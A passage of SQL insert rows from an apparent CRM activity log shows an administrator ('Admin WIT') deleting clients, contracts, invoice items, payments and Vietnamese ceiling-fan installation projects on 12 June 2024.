(12153, 'Client Deleted [ID: 905]', '2024-06-12 16:43:35', 'Admin WIT'),
(12154, 'Client Deleted [ID: 896]', '2024-06-12 16:43:35', 'Admin WIT'),
(12155, 'Client Deleted [ID: 895]', '2024-06-12 16:43:35', 'Admin WIT'),
(12156, 'Client Deleted [ID: 892]', '2024-06-12 16:43:35', 'Admin WIT'),
(12157, 'Client Deleted [ID: 890]', '2024-06-12 16:43:35', 'Admin WIT'),
(12159, 'Client Deleted [ID: 888]', '2024-06-12 16:43:35', 'Admin WIT'),
(12161, 'Client Deleted [ID: 887]', '2024-06-12 16:43:35', 'Admin WIT'),
(12162, 'Client Deleted [ID: 885]', '2024-06-12 16:43:35', 'Admin WIT'),
(12163, 'Client Deleted [ID: 881]', '2024-06-12 16:43:35', 'Admin WIT'),
(12164, 'Client Deleted [ID: 879]', '2024-06-12 16:43:35', 'Admin WIT'),
(12166, 'Client Deleted [ID: 871]', '2024-06-12 16:43:35', 'Admin WIT'),
(12167, 'Client Deleted [ID: 864]', '2024-06-12 16:43:35', 'Admin WIT'),
(12168, 'Client Deleted [ID: 859]', '2024-06-12 16:43:35', 'Admin WIT'),
(12174, 'Client Deleted [ID: 858]', '2024-06-12 16:43:35', 'Admin WIT'),
(12175, 'Client Deleted [ID: 850]', '2024-06-12 16:43:35', 'Admin WIT'),
(12176, 'Client Deleted [ID: 839]', '2024-06-12 16:43:35', 'Admin WIT'),
(12178, 'Client Deleted [ID: 829]', '2024-06-12 16:43:35', 'Admin WIT'),
(12179, 'Client Deleted [ID: 823]', '2024-06-12 16:43:35', 'Admin WIT'),
(12180, 'Client Deleted [ID: 821]', '2024-06-12 16:43:35', 'Admin WIT'),
(12182, 'Client Deleted [ID: 820]', '2024-06-12 16:43:35', 'Admin WIT'),
(12184, 'Client Deleted [ID: 819]', '2024-06-12 16:43:35', 'Admin WIT'),
(12187, 'Client Deleted [ID: 818]', '2024-06-12 16:43:35', 'Admin WIT'),
(12189, 'Client Deleted [ID: 817]', '2024-06-12 16:43:35', 'Admin WIT'),
(12191, 'Client Deleted [ID: 816]', '2024-06-12 16:43:35', 'Admin WIT'),
(12193, 'Client Deleted [ID: 815]', '2024-06-12 16:43:35', 'Admin WIT'),
(12195, 'Client Deleted [ID: 814]', '2024-06-12 16:43:36', 'Admin WIT'),
(12197, 'Client Deleted [ID: 813]', '2024-06-12 16:43:36', 'Admin WIT'),
(12201, 'Client Deleted [ID: 811]', '2024-06-12 16:43:36', 'Admin WIT'),
(12202, 'Client Deleted [ID: 807]', '2024-06-12 16:43:36', 'Admin WIT'),
(12205, 'Client Deleted [ID: 790]', '2024-06-12 16:43:36', 'Admin WIT'),
(12206, 'Client Deleted [ID: 787]', '2024-06-12 16:43:36', 'Admin WIT'),
(12207, 'Client Deleted [ID: 779]', '2024-06-12 16:43:36', 'Admin WIT'),
(12208, 'Client Deleted [ID: 770]', '2024-06-12 16:43:36', 'Admin WIT'),
(12210, 'Client Deleted [ID: 763]', '2024-06-12 16:43:36', 'Admin WIT'),
(12211, 'Client Deleted [ID: 757]', '2024-06-12 16:43:36', 'Admin WIT'),
(12213, 'Client Deleted [ID: 751]', '2024-06-12 16:43:36', 'Admin WIT'),
(12215, 'Client Deleted [ID: 750]', '2024-06-12 16:43:36', 'Admin WIT'),
(12216, 'Client Deleted [ID: 747]', '2024-06-12 16:43:36', 'Admin WIT'),
(12217, 'Client Deleted [ID: 746]', '2024-06-12 16:43:36', 'Admin WIT'),
(12218, 'Contract Attachment Deleted [ContractID: 54]', '2024-06-12 16:46:44', 'Admin WIT'),
(12219, 'Contract Attachment Deleted [ContractID: 54]', '2024-06-12 16:46:44', 'Admin WIT'),
(12220, 'Contract Attachment Deleted [ContractID: 54]', '2024-06-12 16:46:44', 'Admin WIT'),
(12221, 'Contract Attachment Deleted [ContractID: 54]', '2024-06-12 16:46:44', 'Admin WIT'),
(12222, 'Contract Deleted [54]', '2024-06-12 16:46:44', 'Admin WIT'),
(12223, 'Contract Attachment Deleted [ContractID: 56]', '2024-06-12 16:46:50', 'Admin WIT'),
(12224, 'Contract Attachment Deleted [ContractID: 56]', '2024-06-12 16:46:50', 'Admin WIT'),
(12225, 'Contract Deleted [56]', '2024-06-12 16:46:50', 'Admin WIT'),
(12226, 'Contract Attachment Deleted [ContractID: 2]', '2024-06-12 16:46:55', 'Admin WIT'),
(12227, 'Contract Deleted [2]', '2024-06-12 16:46:55', 'Admin WIT'),
(12228, 'Contract Updated [020522/HĐKT/HA-HAY - Hợp đồng học viên]', '2024-06-12 16:48:00', 'Admin WIT'),
(12229, 'Invoice Status Updated [Invoice Number: INV-391-24, From: Đã thanh toán To: Quá hạn]', '2024-06-12 16:50:31', 'Admin WIT'),
(12230, 'Payment Deleted [ID:408, Invoice Number: ]', '2024-06-12 16:50:31', 'Admin WIT'),
(12231, 'Invoice Status Updated [Invoice Number: INV-388-24, From: Đã thanh toán một phần To: Quá hạn]', '2024-06-12 16:50:34', 'Admin WIT'),
(12232, 'Payment Deleted [ID:407, Invoice Number: ]', '2024-06-12 16:50:34', 'Admin WIT'),
(12233, 'Invoice Item Deleted [ID: 1932]', '2024-06-12 17:00:01', 'Admin WIT'),
(12234, 'Invoice Item Deleted [ID: 1938]', '2024-06-12 17:00:01', 'Admin WIT'),
(12235, 'Invoice Item Deleted [ID: 1791]', '2024-06-12 17:00:01', 'Admin WIT'),
(12236, 'Invoice Item Deleted [ID: 1790]', '2024-06-12 17:00:01', 'Admin WIT'),
(12237, 'Invoice Item Deleted [ID: 1796]', '2024-06-12 17:00:01', 'Admin WIT'),
(12238, 'Invoice Item Deleted [ID: 1928]', '2024-06-12 17:00:01', 'Admin WIT'),
(12239, 'Invoice Item Deleted [ID: 1793]', '2024-06-12 17:00:01', 'Admin WIT'),
(12240, 'Invoice Item Deleted [ID: 1785]', '2024-06-12 17:00:01', 'Admin WIT'),
(12241, 'Invoice Item Deleted [ID: 1789]', '2024-06-12 17:00:01', 'Admin WIT'),
(12242, 'Invoice Item Deleted [ID: 1788]', '2024-06-12 17:00:01', 'Admin WIT'),
(12243, 'Invoice Item Deleted [ID: 1798]', '2024-06-12 17:00:01', 'Admin WIT'),
(12244, 'Invoice Item Deleted [ID: 1797]', '2024-06-12 17:00:01', 'Admin WIT'),
(12245, 'Invoice Item Deleted [ID: 1795]', '2024-06-12 17:00:01', 'Admin WIT'),
(12246, 'Invoice Item Deleted [ID: 1794]', '2024-06-12 17:00:01', 'Admin WIT'),
(12247, 'Invoice Item Deleted [ID: 1787]', '2024-06-12 17:00:01', 'Admin WIT'),
(12248, 'Invoice Item Deleted [ID: 1792]', '2024-06-12 17:00:01', 'Admin WIT'),
(12249, 'Invoice Item Deleted [ID: 1786]', '2024-06-12 17:00:01', 'Admin WIT'),
(12250, 'Invoice Item Deleted [ID: 1783]', '2024-06-12 17:00:01', 'Admin WIT'),
(12251, 'Invoice Item Deleted [ID: 1782]', '2024-06-12 17:00:01', 'Admin WIT'),
(12252, 'Invoice Item Deleted [ID: 1936]', '2024-06-12 17:00:01', 'Admin WIT'),
(12253, 'Invoice Item Deleted [ID: 1945]', '2024-06-12 17:00:01', 'Admin WIT'),
(12254, 'Invoice Item Deleted [ID: 1834]', '2024-06-12 17:00:01', 'Admin WIT'),
(12255, 'Invoice Item Deleted [ID: 1843]', '2024-06-12 17:00:01', 'Admin WIT'),
(12256, 'Invoice Item Deleted [ID: 1958]', '2024-06-12 17:00:01', 'Admin WIT'),
(12257, 'Invoice Item Deleted [ID: 1842]', '2024-06-12 17:00:39', 'Admin WIT'),
(12258, 'Invoice Item Deleted [ID: 1957]', '2024-06-12 17:00:39', 'Admin WIT'),
(12259, 'Invoice Item Deleted [ID: 1832]', '2024-06-12 17:00:39', 'Admin WIT'),
(12260, 'Invoice Item Deleted [ID: 1833]', '2024-06-12 17:00:39', 'Admin WIT'),
(12261, 'Invoice Item Deleted [ID: 1840]', '2024-06-12 17:00:39', 'Admin WIT'),
(12262, 'Invoice Item Deleted [ID: 1963]', '2024-06-12 17:00:39', 'Admin WIT'),
(12263, 'Invoice Item Deleted [ID: 1959]', '2024-06-12 17:00:39', 'Admin WIT'),
(12264, 'Invoice Item Deleted [ID: 1960]', '2024-06-12 17:00:39', 'Admin WIT'),
(12265, 'Invoice Item Deleted [ID: 1935]', '2024-06-12 17:00:39', 'Admin WIT'),
(12266, 'Invoice Item Deleted [ID: 1841]', '2024-06-12 17:00:39', 'Admin WIT'),
(12267, 'Invoice Item Deleted [ID: 1961]', '2024-06-12 17:00:39', 'Admin WIT'),
(12268, 'Invoice Item Deleted [ID: 1962]', '2024-06-12 17:00:39', 'Admin WIT'),
(12269, 'Invoice Item Deleted [ID: 1964]', '2024-06-12 17:00:39', 'Admin WIT'),
(12270, 'Invoice Item Deleted [ID: 1831]', '2024-06-12 17:00:39', 'Admin WIT'),
(12271, 'Invoice Item Deleted [ID: 1835]', '2024-06-12 17:00:39', 'Admin WIT'),
(12272, 'Invoice Item Deleted [ID: 1836]', '2024-06-12 17:00:39', 'Admin WIT'),
(12273, 'Invoice Item Deleted [ID: 1837]', '2024-06-12 17:00:39', 'Admin WIT'),
(12274, 'Invoice Item Deleted [ID: 1830]', '2024-06-12 17:00:39', 'Admin WIT'),
(12275, 'Invoice Item Deleted [ID: 1844]', '2024-06-12 17:00:39', 'Admin WIT'),
(12276, 'Invoice Item Deleted [ID: 1845]', '2024-06-12 17:00:39', 'Admin WIT'),
(12277, 'Invoice Item Deleted [ID: 1847]', '2024-06-12 17:00:39', 'Admin WIT'),
(12278, 'Invoice Item Deleted [ID: 1846]', '2024-06-12 17:00:39', 'Admin WIT'),
(12279, 'Invoice Item Deleted [ID: 1852]', '2024-06-12 17:00:40', 'Admin WIT'),
(12280, 'Invoice Item Deleted [ID: 1853]', '2024-06-12 17:00:40', 'Admin WIT'),
(12281, 'Invoice Item Deleted [ID: 1851]', '2024-06-12 17:00:40', 'Admin WIT'),
(12282, 'Invoice Item Deleted [ID: 1949]', '2024-06-12 17:00:40', 'Admin WIT'),
(12283, 'Invoice Item Deleted [ID: 1950]', '2024-06-12 17:00:40', 'Admin WIT'),
(12284, 'Invoice Item Deleted [ID: 1850]', '2024-06-12 17:00:40', 'Admin WIT'),
(12285, 'Invoice Item Deleted [ID: 1948]', '2024-06-12 17:00:40', 'Admin WIT'),
(12286, 'Invoice Item Deleted [ID: 1849]', '2024-06-12 17:00:40', 'Admin WIT'),
(12287, 'Invoice Item Deleted [ID: 1848]', '2024-06-12 17:00:40', 'Admin WIT'),
(12288, 'Invoice Item Deleted [ID: 1825]', '2024-06-12 17:00:40', 'Admin WIT'),
(12289, 'Invoice Item Deleted [ID: 1822]', '2024-06-12 17:00:40', 'Admin WIT'),
(12290, 'Invoice Item Deleted [ID: 1823]', '2024-06-12 17:00:40', 'Admin WIT'),
(12291, 'Invoice Item Deleted [ID: 1829]', '2024-06-12 17:00:40', 'Admin WIT'),
(12292, 'Invoice Item Deleted [ID: 1828]', '2024-06-12 17:00:40', 'Admin WIT'),
(12293, 'Invoice Item Deleted [ID: 1821]', '2024-06-12 17:00:40', 'Admin WIT'),
(12294, 'Invoice Item Deleted [ID: 1827]', '2024-06-12 17:00:40', 'Admin WIT'),
(12295, 'Invoice Item Deleted [ID: 1826]', '2024-06-12 17:00:40', 'Admin WIT'),
(12296, 'Invoice Item Deleted [ID: 1824]', '2024-06-12 17:00:40', 'Admin WIT'),
(12297, 'Invoice Item Deleted [ID: 1956]', '2024-06-12 17:00:40', 'Admin WIT'),
(12298, 'Invoice Item Deleted [ID: 1784]', '2024-06-12 17:00:40', 'Admin WIT'),
(12299, 'Invoice Item Deleted [ID: 1924]', '2024-06-12 17:00:40', 'Admin WIT'),
(12300, 'Invoice Item Deleted [ID: 1925]', '2024-06-12 17:00:40', 'Admin WIT'),
(12301, 'Invoice Item Deleted [ID: 1952]', '2024-06-12 17:00:40', 'Admin WIT'),
(12302, 'Invoice Item Deleted [ID: 1954]', '2024-06-12 17:00:40', 'Admin WIT'),
(12303, 'Invoice Item Deleted [ID: 1946]', '2024-06-12 17:00:40', 'Admin WIT'),
(12304, 'Invoice Item Deleted [ID: 1926]', '2024-06-12 17:00:40', 'Admin WIT'),
(12305, 'Invoice Item Deleted [ID: 1743]', '2024-06-12 17:00:40', 'Admin WIT'),
(12306, 'Invoice Item Deleted [ID: 1742]', '2024-06-12 17:00:40', 'Admin WIT'),
(12307, 'Invoice Item Deleted [ID: 1745]', '2024-06-12 17:00:40', 'Admin WIT'),
(12308, 'Invoice Item Deleted [ID: 1746]', '2024-06-12 17:00:40', 'Admin WIT'),
(12309, 'Invoice Item Deleted [ID: 1744]', '2024-06-12 17:00:40', 'Admin WIT'),
(12310, 'Invoice Item Deleted [ID: 1741]', '2024-06-12 17:00:40', 'Admin WIT'),
(12311, 'Invoice Item Deleted [ID: 1967]', '2024-06-12 17:00:40', 'Admin WIT'),
(12312, 'Invoice Item Deleted [ID: 1902]', '2024-06-12 17:00:40', 'Admin WIT'),
(12313, 'Invoice Item Deleted [ID: 1864]', '2024-06-12 17:00:40', 'Admin WIT'),
(12314, 'Invoice Item Deleted [ID: 1867]', '2024-06-12 17:00:40', 'Admin WIT'),
(12315, 'Invoice Item Deleted [ID: 1863]', '2024-06-12 17:00:40', 'Admin WIT'),
(12316, 'Invoice Item Deleted [ID: 1865]', '2024-06-12 17:00:40', 'Admin WIT'),
(12317, 'Invoice Item Deleted [ID: 1927]', '2024-06-12 17:00:40', 'Admin WIT'),
(12318, 'Invoice Item Deleted [ID: 1860]', '2024-06-12 17:00:40', 'Admin WIT'),
(12319, 'Invoice Item Deleted [ID: 1880]', '2024-06-12 17:00:40', 'Admin WIT'),
(12320, 'Invoice Item Deleted [ID: 1881]', '2024-06-12 17:00:40', 'Admin WIT'),
(12321, 'Invoice Item Deleted [ID: 1882]', '2024-06-12 17:00:40', 'Admin WIT'),
(12322, 'Invoice Item Deleted [ID: 1879]', '2024-06-12 17:00:40', 'Admin WIT'),
(12323, 'Invoice Item Deleted [ID: 1968]', '2024-06-12 17:00:40', 'Admin WIT'),
(12324, 'Invoice Item Deleted [ID: 1859]', '2024-06-12 17:00:40', 'Admin WIT'),
(12325, 'Invoice Item Deleted [ID: 1944]', '2024-06-12 17:00:40', 'Admin WIT'),
(12326, 'Invoice Item Deleted [ID: 1942]', '2024-06-12 17:00:40', 'Admin WIT'),
(12327, 'Invoice Item Deleted [ID: 1953]', '2024-06-12 17:00:40', 'Admin WIT'),
(12328, 'Invoice Item Deleted [ID: 1903]', '2024-06-12 17:00:40', 'Admin WIT'),
(12329, 'Invoice Item Deleted [ID: 1904]', '2024-06-12 17:00:40', 'Admin WIT'),
(12330, 'Invoice Item Deleted [ID: 1905]', '2024-06-12 17:00:40', 'Admin WIT'),
(12331, 'Invoice Item Deleted [ID: 1910]', '2024-06-12 17:00:40', 'Admin WIT'),
(12332, 'Invoice Item Deleted [ID: 1909]', '2024-06-12 17:00:40', 'Admin WIT'),
(12333, 'Invoice Item Deleted [ID: 1870]', '2024-06-12 17:00:40', 'Admin WIT'),
(12334, 'Invoice Item Deleted [ID: 1883]', '2024-06-12 17:00:40', 'Admin WIT'),
(12335, 'Invoice Item Deleted [ID: 1884]', '2024-06-12 17:00:40', 'Admin WIT'),
(12336, 'Invoice Item Deleted [ID: 1872]', '2024-06-12 17:00:40', 'Admin WIT'),
(12337, 'Invoice Item Deleted [ID: 1871]', '2024-06-12 17:00:40', 'Admin WIT'),
(12338, 'Invoice Item Deleted [ID: 1911]', '2024-06-12 17:00:40', 'Admin WIT'),
(12339, 'Invoice Item Deleted [ID: 1912]', '2024-06-12 17:00:40', 'Admin WIT'),
(12340, 'Invoice Item Deleted [ID: 1817]', '2024-06-12 17:00:40', 'Admin WIT'),
(12341, 'Invoice Item Deleted [ID: 1816]', '2024-06-12 17:00:40', 'Admin WIT'),
(12342, 'Invoice Item Deleted [ID: 1815]', '2024-06-12 17:00:40', 'Admin WIT'),
(12343, 'Invoice Item Deleted [ID: 1814]', '2024-06-12 17:00:40', 'Admin WIT'),
(12344, 'Invoice Item Deleted [ID: 1931]', '2024-06-12 17:00:40', 'Admin WIT'),
(12345, 'Invoice Item Deleted [ID: 1930]', '2024-06-12 17:00:40', 'Admin WIT'),
(12346, 'Invoice Item Deleted [ID: 1811]', '2024-06-12 17:00:40', 'Admin WIT'),
(12347, 'Invoice Item Deleted [ID: 1813]', '2024-06-12 17:00:40', 'Admin WIT'),
(12348, 'Invoice Item Deleted [ID: 1812]', '2024-06-12 17:00:40', 'Admin WIT'),
(12349, 'Invoice Item Deleted [ID: 1807]', '2024-06-12 17:00:40', 'Admin WIT'),
(12350, 'Invoice Item Deleted [ID: 1808]', '2024-06-12 17:00:40', 'Admin WIT'),
(12351, 'Invoice Item Deleted [ID: 1809]', '2024-06-12 17:00:40', 'Admin WIT'),
(12352, 'Invoice Item Deleted [ID: 1810]', '2024-06-12 17:00:40', 'Admin WIT'),
(12353, 'Invoice Item Deleted [ID: 1838]', '2024-06-12 17:00:40', 'Admin WIT'),
(12354, 'Invoice Item Deleted [ID: 1839]', '2024-06-12 17:00:40', 'Admin WIT'),
(12355, 'Invoice Item Deleted [ID: 1913]', '2024-06-12 17:00:40', 'Admin WIT'),
(12356, 'Invoice Item Deleted [ID: 1914]', '2024-06-12 17:00:40', 'Admin WIT'),
(12357, 'Invoice Item Deleted [ID: 1862]', '2024-06-12 17:00:40', 'Admin WIT'),
(12358, 'Invoice Item Deleted [ID: 1861]', '2024-06-12 17:00:40', 'Admin WIT'),
(12359, 'Invoice Item Deleted [ID: 1858]', '2024-06-12 17:00:40', 'Admin WIT'),
(12360, 'Invoice Item Deleted [ID: 1915]', '2024-06-12 17:00:40', 'Admin WIT'),
(12361, 'Invoice Item Deleted [ID: 1916]', '2024-06-12 17:00:40', 'Admin WIT'),
(12362, 'Invoice Item Deleted [ID: 1917]', '2024-06-12 17:00:40', 'Admin WIT'),
(12363, 'Invoice Item Deleted [ID: 1818]', '2024-06-12 17:00:40', 'Admin WIT'),
(12364, 'Invoice Item Deleted [ID: 1819]', '2024-06-12 17:00:40', 'Admin WIT'),
(12365, 'Invoice Item Deleted [ID: 1820]', '2024-06-12 17:00:40', 'Admin WIT'),
(12366, 'Invoice Item Deleted [ID: 1923]', '2024-06-12 17:00:40', 'Admin WIT'),
(12367, 'Invoice Item Deleted [ID: 1761]', '2024-06-12 17:00:40', 'Admin WIT'),
(12368, 'Invoice Item Deleted [ID: 1762]', '2024-06-12 17:00:40', 'Admin WIT'),
(12369, 'Invoice Item Deleted [ID: 1763]', '2024-06-12 17:00:40', 'Admin WIT'),
(12370, 'Invoice Item Deleted [ID: 1778]', '2024-06-12 17:00:40', 'Admin WIT'),
(12371, 'Invoice Item Deleted [ID: 1779]', '2024-06-12 17:00:40', 'Admin WIT'),
(12372, 'Invoice Item Deleted [ID: 1747]', '2024-06-12 17:00:40', 'Admin WIT'),
(12373, 'Invoice Item Deleted [ID: 1748]', '2024-06-12 17:00:40', 'Admin WIT'),
(12374, 'Invoice Item Deleted [ID: 1749]', '2024-06-12 17:00:40', 'Admin WIT'),
(12375, 'Invoice Item Deleted [ID: 1772]', '2024-06-12 17:00:40', 'Admin WIT'),
(12376, 'Invoice Item Deleted [ID: 1776]', '2024-06-12 17:00:40', 'Admin WIT'),
(12377, 'Invoice Item Deleted [ID: 1780]', '2024-06-12 17:00:40', 'Admin WIT'),
(12378, 'Invoice Item Deleted [ID: 1777]', '2024-06-12 17:00:40', 'Admin WIT'),
(12379, 'Invoice Item Deleted [ID: 1771]', '2024-06-12 17:00:40', 'Admin WIT'),
(12380, 'Invoice Item Deleted [ID: 1775]', '2024-06-12 17:00:40', 'Admin WIT'),
(12381, 'Invoice Item Deleted [ID: 1758]', '2024-06-12 17:00:40', 'Admin WIT'),
(12382, 'Invoice Item Deleted [ID: 1801]', '2024-06-12 17:00:40', 'Admin WIT'),
(12383, 'Invoice Item Deleted [ID: 1800]', '2024-06-12 17:00:40', 'Admin WIT'),
(12384, 'Invoice Item Deleted [ID: 1802]', '2024-06-12 17:00:40', 'Admin WIT'),
(12385, 'Invoice Item Deleted [ID: 1803]', '2024-06-12 17:00:40', 'Admin WIT'),
(12386, 'Invoice Item Deleted [ID: 1799]', '2024-06-12 17:00:40', 'Admin WIT'),
(12387, 'Invoice Item Deleted [ID: 1766]', '2024-06-12 17:00:40', 'Admin WIT'),
(12388, 'Invoice Item Deleted [ID: 1765]', '2024-06-12 17:00:40', 'Admin WIT'),
(12389, 'Invoice Item Deleted [ID: 1767]', '2024-06-12 17:00:40', 'Admin WIT'),
(12390, 'Invoice Item Deleted [ID: 1768]', '2024-06-12 17:00:40', 'Admin WIT'),
(12391, 'Invoice Item Deleted [ID: 1769]', '2024-06-12 17:00:40', 'Admin WIT'),
(12392, 'Invoice Item Deleted [ID: 1770]', '2024-06-12 17:00:40', 'Admin WIT'),
(12393, 'Invoice Item Deleted [ID: 1764]', '2024-06-12 17:00:40', 'Admin WIT'),
(12394, 'Invoice Item Deleted [ID: 1781]', '2024-06-12 17:00:40', 'Admin WIT'),
(12395, 'Invoice Item Deleted [ID: 1868]', '2024-06-12 17:00:40', 'Admin WIT'),
(12396, 'Invoice Item Deleted [ID: 1869]', '2024-06-12 17:00:40', 'Admin WIT'),
(12397, 'Invoice Item Deleted [ID: 1885]', '2024-06-12 17:00:40', 'Admin WIT'),
(12398, 'Invoice Item Deleted [ID: 1943]', '2024-06-12 17:00:40', 'Admin WIT'),
(12399, 'Invoice Item Deleted [ID: 1940]', '2024-06-12 17:00:40', 'Admin WIT'),
(12400, 'Invoice Item Deleted [ID: 1908]', '2024-06-12 17:00:40', 'Admin WIT'),
(12401, 'Invoice Item Deleted [ID: 1886]', '2024-06-12 17:00:40', 'Admin WIT'),
(12402, 'Invoice Item Deleted [ID: 1887]', '2024-06-12 17:00:40', 'Admin WIT'),
(12403, 'Invoice Item Deleted [ID: 1966]', '2024-06-12 17:00:40', 'Admin WIT'),
(12404, 'Invoice Item Deleted [ID: 1939]', '2024-06-12 17:00:40', 'Admin WIT'),
(12405, 'Invoice Item Deleted [ID: 1906]', '2024-06-12 17:00:40', 'Admin WIT'),
(12406, 'Invoice Item Deleted [ID: 1907]', '2024-06-12 17:00:40', 'Admin WIT'),
(12407, 'Invoice Item Deleted [ID: 1921]', '2024-06-12 17:00:40', 'Admin WIT'),
(12408, 'Invoice Item Deleted [ID: 1920]', '2024-06-12 17:00:40', 'Admin WIT'),
(12409, 'Invoice Item Deleted [ID: 1922]', '2024-06-12 17:00:40', 'Admin WIT'),
(12410, 'Invoice Item Deleted [ID: 1919]', '2024-06-12 17:00:40', 'Admin WIT'),
(12411, 'Invoice Item Deleted [ID: 1918]', '2024-06-12 17:00:40', 'Admin WIT'),
(12412, 'Invoice Item Deleted [ID: 1888]', '2024-06-12 17:00:40', 'Admin WIT'),
(12413, 'Invoice Item Deleted [ID: 1889]', '2024-06-12 17:00:40', 'Admin WIT'),
(12414, 'Invoice Item Deleted [ID: 1890]', '2024-06-12 17:00:40', 'Admin WIT'),
(12415, 'Invoice Item Deleted [ID: 1891]', '2024-06-12 17:00:40', 'Admin WIT'),
(12416, 'Invoice Item Deleted [ID: 1857]', '2024-06-12 17:00:40', 'Admin WIT'),
(12417, 'Invoice Item Deleted [ID: 1854]', '2024-06-12 17:00:40', 'Admin WIT'),
(12418, 'Invoice Item Deleted [ID: 1856]', '2024-06-12 17:00:40', 'Admin WIT'),
(12419, 'Invoice Item Deleted [ID: 1855]', '2024-06-12 17:00:40', 'Admin WIT'),
(12420, 'Invoice Item Deleted [ID: 1877]', '2024-06-12 17:00:40', 'Admin WIT'),
(12421, 'Invoice Item Deleted [ID: 1878]', '2024-06-12 17:00:40', 'Admin WIT'),
(12422, 'Invoice Item Deleted [ID: 1866]', '2024-06-12 17:00:40', 'Admin WIT'),
(12423, 'Invoice Item Deleted [ID: 1875]', '2024-06-12 17:00:40', 'Admin WIT'),
(12424, 'Invoice Item Deleted [ID: 1876]', '2024-06-12 17:00:40', 'Admin WIT'),
(12425, 'Invoice Item Deleted [ID: 1804]', '2024-06-12 17:00:40', 'Admin WIT'),
(12426, 'Invoice Item Deleted [ID: 1805]', '2024-06-12 17:00:40', 'Admin WIT'),
(12427, 'Invoice Item Deleted [ID: 1806]', '2024-06-12 17:00:40', 'Admin WIT'),
(12428, 'Invoice Item Deleted [ID: 1897]', '2024-06-12 17:00:40', 'Admin WIT'),
(12429, 'Invoice Item Deleted [ID: 1900]', '2024-06-12 17:00:40', 'Admin WIT'),
(12430, 'Invoice Item Deleted [ID: 1898]', '2024-06-12 17:00:40', 'Admin WIT'),
(12431, 'Invoice Item Deleted [ID: 1899]', '2024-06-12 17:00:40', 'Admin WIT'),
(12432, 'Invoice Item Deleted [ID: 1901]', '2024-06-12 17:00:40', 'Admin WIT'),
(12433, 'Invoice Item Deleted [ID: 1751]', '2024-06-12 17:00:40', 'Admin WIT'),
(12434, 'Invoice Item Deleted [ID: 1752]', '2024-06-12 17:00:40', 'Admin WIT'),
(12435, 'Invoice Item Deleted [ID: 1753]', '2024-06-12 17:00:40', 'Admin WIT'),
(12436, 'Invoice Item Deleted [ID: 1754]', '2024-06-12 17:00:40', 'Admin WIT'),
(12437, 'Invoice Item Deleted [ID: 1773]', '2024-06-12 17:00:40', 'Admin WIT'),
(12438, 'Invoice Item Deleted [ID: 1774]', '2024-06-12 17:00:40', 'Admin WIT'),
(12439, 'Invoice Item Deleted [ID: 1750]', '2024-06-12 17:00:40', 'Admin WIT'),
(12440, 'Invoice Item Deleted [ID: 1755]', '2024-06-12 17:00:40', 'Admin WIT'),
(12441, 'Invoice Item Deleted [ID: 1756]', '2024-06-12 17:00:40', 'Admin WIT'),
(12442, 'Invoice Item Deleted [ID: 1757]', '2024-06-12 17:00:40', 'Admin WIT'),
(12443, 'Invoice Item Deleted [ID: 1760]', '2024-06-12 17:00:40', 'Admin WIT'),
(12444, 'Invoice Item Deleted [ID: 1759]', '2024-06-12 17:00:40', 'Admin WIT'),
(12445, 'Invoice Item Deleted [ID: 1970]', '2024-06-12 17:00:40', 'Admin WIT'),
(12446, 'Invoice Item Deleted [ID: 1947]', '2024-06-12 17:00:40', 'Admin WIT'),
(12447, 'Invoice Item Deleted [ID: 1941]', '2024-06-12 17:00:40', 'Admin WIT'),
(12448, 'Invoice Item Deleted [ID: 1951]', '2024-06-12 17:00:40', 'Admin WIT'),
(12449, 'Invoice Item Updated [ID: 1965, Khóa học 01]', '2024-06-12 17:01:00', 'Admin WIT'),
(12450, 'Payment Deleted [ID:406, Invoice Number: ]', '2024-06-12 17:03:05', 'Admin WIT'),
(12451, 'Payment Deleted [ID:405, Invoice Number: ]', '2024-06-12 17:03:08', 'Admin WIT'),
(12452, 'Payment Deleted [ID:404, Invoice Number: ]', '2024-06-12 17:03:11', 'Admin WIT'),
(12453, 'Payment Deleted [ID:378, Invoice Number: ]', '2024-06-12 17:03:19', 'Admin WIT'),
(12454, 'Payment Deleted [ID:403, Invoice Number: ]', '2024-06-12 17:03:56', 'Admin WIT'),
(12455, 'Payment Deleted [ID:402, Invoice Number: ]', '2024-06-12 17:04:00', 'Admin WIT'),
(12456, 'Payment Deleted [ID:400, Invoice Number: ]', '2024-06-12 17:04:03', 'Admin WIT'),
(12457, 'Project Deleted [ID: 25, Name: RMIT Vietnam - lắp đặt quạt trần Essence căn tin AB1]', '2024-06-12 17:06:19', 'Admin WIT'),
(12458, 'Project Deleted [ID: 21, Name: Xưởng Mới - PharmaCity Long Thành - Đồng Nai]', '2024-06-12 17:06:22', 'Admin WIT'),
(12459, 'Project Deleted [ID: 27, Name: Đặt hàng 2 bộ quạt SUNON PS10-24ft (Tuần đầu tiên tháng 4 giao hàng)]', '2024-06-12 17:06:26', 'Admin WIT'),
(12460, 'Project Deleted [ID: 6, Name: Quạt trần CN - YINHWA FACTORY]', '2024-06-12 17:06:29', 'Admin WIT'),
(12461, 'Project Deleted [ID: 22, Name: NHÀ MÁY YINHWA - ĐỒNG NAI]', '2024-06-12 17:06:32', 'Admin WIT'),
(12462, 'Project Deleted [ID: 20, Name: Khu Nhà Hàng Biển Sáng - Hamptons Hồ Tràm]', '2024-06-12 17:06:36', 'Admin WIT'),
(12463, 'Project Deleted [ID: 7, Name: Hòn Thơm - Phú Quốc]', '2024-06-12 17:06:39', 'Admin WIT'),
(12464, 'Project Deleted [ID: 18, Name: Dự án Sanctury Hồ Tràm đợt 4]', '2024-06-12 17:06:42', 'Admin WIT'),
(12465, 'Project Deleted [ID: 17, Name: Dự án nhà máy Sữa DenEast Bình Dương]', '2024-06-12 17:06:45', 'Admin WIT'),
(12466, 'Client Deleted [ID: 1448]', '2024-06-12 17:07:51', 'Admin WIT'),
(12467, 'Client Deleted [ID: 1447]', '2024-06-12 17:08:07', 'Admin WIT'),
(12468, 'Client Deleted [ID: 1446]', '2024-06-12 17:08:07', 'Admin WIT'),
(12469, 'Client Deleted [ID: 1445]', '2024-06-12 17:08:07', 'Admin WIT'),
(12470, 'Client Deleted [ID: 1444]', '2024-06-12 17:08:07', 'Admin WIT'),
(12471, 'Client Deleted [ID: 1443]', '2024-06-12 17:08:07', 'Admin WIT'),
(12472, 'Client Deleted [ID: 1437]', '2024-06-12 17:08:07', 'Admin WIT'),
(12473, 'Client Deleted [ID: 1436]', '2024-06-12 17:08:07', 'Admin WIT'),
(12474, 'Client Deleted [ID: 1435]', '2024-06-12 17:08:07', 'Admin WIT'),
(12475, 'Client Deleted [ID: 1433]', '2024-06-12 17:08:07', 'Admin WIT'),
(12476, 'Client Deleted [ID: 1432]', '2024-06-12 17:08:07', 'Admin WIT'),
